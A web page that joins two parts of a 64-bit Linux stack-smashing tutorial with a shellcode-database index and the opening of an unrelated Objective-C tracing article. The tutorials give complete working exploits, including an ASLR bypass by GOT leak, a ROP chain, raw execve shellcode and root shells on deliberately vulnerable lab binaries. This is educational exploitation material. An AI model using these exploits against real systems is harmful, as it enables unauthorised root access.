64-bit Linux stack smashing tutorial: Part 3

t’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Leaking a libc address

Here’s the source code for the binary we’ll be exploiting:

/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
    asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
    char buf[150];
    ssize_t b;
    memset(buf, 0, 150);
    printf("Enter input: ");
    b = read(0, buf, 400);

    printf("Recv: ");
    write(1, buf, b);
    return 0;
}

int main(int argc, char *argv[]){
    setbuf(stdout, 0);
    vuln();
    return 0;
}

You can compile it yourself, or download the precompiled binary here.

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

  1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
  2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
  3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
  4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak

Grab memset()’s entry in the GOT:

# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

# echo "br *0x4006c6" >> ~/.gdbinit

Now let’s attach gdb to socat.

# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda$ c
Continuing.

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

# nc localhost 2323

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
   0x4006cb <vuln+36>:  mov    edi,0x4007e4

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda$ x/5i 0x0000000000400576
   0x400576 <memset@plt+6>:     push   0x3
   0x40057b <memset@plt+11>:    jmp    0x400530
   0x400580 <read@plt>: jmp    QWORD PTR [rip+0x200ab2]        # 0x601038 <read@got.plt>
   0x400586 <read@plt+6>:       push   0x4
   0x40058b <read@plt+11>:      jmp    0x400530

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

gdb-peda$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda$ x/5i 0x00007f86f37335c0
   0x7f86f37335c0 <memset>:     movd   xmm8,esi
   0x7f86f37335c5 <memset+5>:   mov    rax,rdi
   0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
   0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
   0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0

If we can write memset()’s GOT entry back to us, we’ll receive it’s address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to setup a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

# keep socket open so gdb doesn't get a SIGTERM
while True: 
    s.recv(1024)

Let’s see it in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “p memset”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

# ldd leak
        linux-vdso.so.1 =>  (0x00007ffd5affe000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
        /lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
    66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh")

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-priviledged user:

koji@pwnbox:/root/work$ whoami
koji
koji@pwnbox:/root/work$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.

64-bit Linux stack smashing tutorial: Part 1

This series of tutorials is aimed as a quick introduction to exploiting buffer overflows on 64-bit Linux binaries. It’s geared primarily towards folks who are already familiar with exploiting 32-bit binaries and are wanting to apply their knowledge to exploiting 64-bit binaries. This tutorial is the result of compiling scattered notes I’ve collected over time into a cohesive whole.

Setup

Writing exploits for 64-bit Linux binaries isn’t too different from writing 32-bit exploits. There are however a few gotchas and I’ll be touching on those as we go along. The best way to learn this stuff is to do it, so I encourage you to follow along. I’ll be using Ubuntu 14.10 to compile the vulnerable binaries as well as to write the exploits. I’ll provide pre-compiled binaries as well in case you don’t want to compile them yourself. I’ll also be making use of the following tools for this particular tutorial:

64-bit, what you need to know

For the purpose of this tutorial, you should be aware of the following points:

  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • Maximum canonical address size of 0x00007FFFFFFFFFFF.
  • Parameters to functions are passed through registers.

It’s always good to know more, so feel free to Google information on 64-bit architecture and assembly programming. Wikipedia has a nice short article that’s worth reading.

Classic stack smashing

Let’s begin with a classic stack smashing example. We’ll disable ASLR, NX, and stack canaries so we can focus on the actual exploitation. The source code for our vulnerable binary is as follows:

/* Compile: gcc -fno-stack-protector -z execstack classic.c -o classic */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */ 

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

There’s an obvious buffer overflow in the vuln() function when read() can copy up to 400 bytes into an 80 byte buffer. So technically if we pass 400 bytes in, we should overflow the buffer and overwrite RIP with our payload right? Let’s create an exploit containing the following:

#!/usr/bin/env python
buf = ""
buf += "A"*400

f = open("in.txt", "w")
f.write(buf)

This script will create a file called in.txt containing 400 “A”s. We’ll load classic into gdb and redirect the contents of in.txt into it and see if we can overwrite RIP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe508 ('A' <repeats 200 times>...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('A' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ('A' <repeats 200 times>...)
0008| 0x7fffffffe510 ('A' <repeats 200 times>...)
0016| 0x7fffffffe518 ('A' <repeats 200 times>...)
0024| 0x7fffffffe520 ('A' <repeats 200 times>...)
0032| 0x7fffffffe528 ('A' <repeats 200 times>...)
0040| 0x7fffffffe530 ('A' <repeats 200 times>...)
0048| 0x7fffffffe538 ('A' <repeats 200 times>...)
0056| 0x7fffffffe540 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040060f in vuln ()

So the program crashed as expected, but not because we overwrote RIP with an invalid address. In fact we don’t control RIP at all. Recall as I mentioned earlier that the maximum address size is 0x00007FFFFFFFFFFF. We’re overwriting RIP with a non-canonical address of 0x4141414141414141 which causes the processor to raise an exception. In order to control RIP, we need to overwrite it with 0x0000414141414141 instead. So really the goal is to find the offset with which to overwrite RIP with a canonical address. We can use a cyclic pattern to find this offset:

gdb-peda$ pattern_create 400 in.txt
Writing pattern of 400 chars to filename "in.txt"

Let’s run it again and examine the contents of RSP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA\220\001\n")
RDI: 0x1
RBP: 0x416841414c414136 ('6AALAAhA')
RSP: 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4147414131414162 ('bAA1AAGA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
0008| 0x7fffffffe510 ("AA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%"...)
0016| 0x7fffffffe518 ("jAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA"...)
0024| 0x7fffffffe520 ("AkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%j"...)
0032| 0x7fffffffe528 ("AAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%"...)
0040| 0x7fffffffe530 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA"...)
0048| 0x7fffffffe538 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%R"...)
0056| 0x7fffffffe540 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%nA%SA%"...)
[------------------------------------------------------------------------------]

We can clearly see our cyclic pattern on the stack. Let’s find the offset:

gdb-peda$ x/wx $rsp
0x7fffffffe508: 0x41413741

gdb-peda$ pattern_offset 0x41413741
1094793025 found at offset: 104

So RIP is at offset 104. Let’s update our exploit and see if we can overwrite RIP this time:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104                      # offset to RIP
buf += pack("<Q", 0x424242424242)   # overwrite RIP with 0x0000424242424242
buf += "C"*290                      # padding to keep payload length at 400 bytes

f = open("in.txt", "w")
f.write(buf)

Run it to create an updated in.txt file, and then redirect it into the program within gdb:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe510 ('C' <repeats 200 times>...)
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('C' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x424242424242
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 ('C' <repeats 200 times>...)
0008| 0x7fffffffe518 ('C' <repeats 200 times>...)
0016| 0x7fffffffe520 ('C' <repeats 200 times>...)
0024| 0x7fffffffe528 ('C' <repeats 200 times>...)
0032| 0x7fffffffe530 ('C' <repeats 200 times>...)
0040| 0x7fffffffe538 ('C' <repeats 200 times>...)
0048| 0x7fffffffe540 ('C' <repeats 200 times>...)
0056| 0x7fffffffe548 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()

Excellent, we’ve gained control over RIP. Since this program is compiled without NX or stack canaries, we can write our shellcode directly on the stack and return to it. Let’s go ahead and finish it. I’ll be using a 27-byte shellcode that executes execve(“/bin/sh”) found here.

We’ll store the shellcode on the stack via an environment variable and find its address on the stack using getenvaddr:

koji@pwnbox:~/classic$ export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

koji@pwnbox:~/classic$ ~/getenvaddr PWN ./classic
PWN will be at 0x7fffffffeefa

We’ll update our exploit to return to our shellcode at 0x7fffffffeefa:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104
buf += pack("<Q", 0x7fffffffeefa)

f = open("in.txt", "w")
f.write(buf)

Make sure to change the ownership and permission of classic to SUID root so we can get our root shell:

koji@pwnbox:~/classic$ sudo chown root classic
koji@pwnbox:~/classic$ sudo chmod 4755 classic

And finally, we’ll update in.txt and pipe our payload into classic:

koji@pwnbox:~/classic$ python ./sploit.py
koji@pwnbox:~/classic$ (cat in.txt ; cat) | ./classic
Try to exec /bin/sh
Read 112 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp
No shell for you :(
whoami
root

We’ve got a root shell, so our exploit worked. The main gotcha here was that we needed to be mindful of the maximum address size, otherwise we wouldn’t have been able to gain control of RIP. This concludes part 1 of the tutorial.

Part 1 was pretty easy, so for part 2 we’ll be using the same binary, only this time it will be compiled with NX. This will prevent us from executing instructions on the stack, so we’ll be looking at using ret2libc to get a root shell.

Shellcodes database

AIX


Alpha


BSD


Cisco


Sco


FreeBSD

Intel x86-64

Intel x86


Hp-Ux


Irix


Linux

ARM

Strong ARM

Super-H

MIPS

PPC

Sparc

CRISv32

Intel x86-64

Intel x86


NetBSD


OpenBSD


OSX

PPC

Intel x86-64

Intel x86


Solaris

MIPS

SPARC

Intel x86


Windows

Tracing Objective-C method calls

Linux has this great tool called strace, on OSX there’s a tool called dtruss — based on dtrace. Dtruss is great in functionality, it gives pretty much everything you need. It is just not as nice to use as strace. However, on Linux there is also ltrace for library tracing. That is arguably more useful because you can see much more granular application activity. Unfortunately, there isn’t such a tool on OSX. So, I decided to make one — albeit a simpler version for now. I called it objc_trace.

Objc_trace’s functionality is quite limited at the moment. It will print out the name of the method, the class and a list of parameters to the method. In the future it will be expanded to do more things, however just knowing which method was called is enough for many debugging purposes.

Something about the language

Without going into too much detail let’s look into the relevant parts of the Objective-Cruntime. This subject has been covered pretty well by the hacker community. In Phrack there is a great article covering various internals of the language. However, I will scratch the surface to review some aspects that are useful for this context.

The language is incredibly dynamic. While still backwards compatible to C (or C++), most of the code is written using classes and methods a.k.a. structures and function pointers. A class is exactly what you’re thinking of. It can have static or instance methods or fields. For example, you might have a class Book with a method Pages that returns the contents. You might call it this way:

	Book* book = [[Book alloc] init];
	Page* pages = [book Pages];

The alloc function is a static method while the others (init and Pages) are dynamic. What actually happens is that the system sends messages to the object or the static class. The message contains the class name, the instance, the method name and any parameters. The runtime will resolve which compiled function actually implements this method and call that.

If anything above doesn’t make sense you might want to read the referenced Phrack article for more details.

Message passing is great, though there are all kinds of efficiency considerations in play. For example, methods that you call will eventually get cached so that the resolution process occurs much faster. What’s important to note is that there is some smoke and mirrors going on.

The system is actually not sending messages under the hood. What it is doing is routing the execution using a single library call: objc_msgSend [1]. This is due to how the concept of a message is implemented under the hood.

	id objc_msgSend(id self, SEL op, ...)

Let’s take ourselves out of the Objective-C abstractions for a while and think about how things are implemented in C. When a method is called the stack and the registers are configured for the objc_msgSend call. id type is kind of like a void * but restricted to Objective-C class instances. SEL type is actually char* type and refers to selectors, more specifically the methods names (which include parameters). For example, a method that takes two parameters will have a selector that might look something like this: createGroup:withCapacity:. Colons signal that there should be a parameter there. Really quite confusing but we won’t dwell on that.

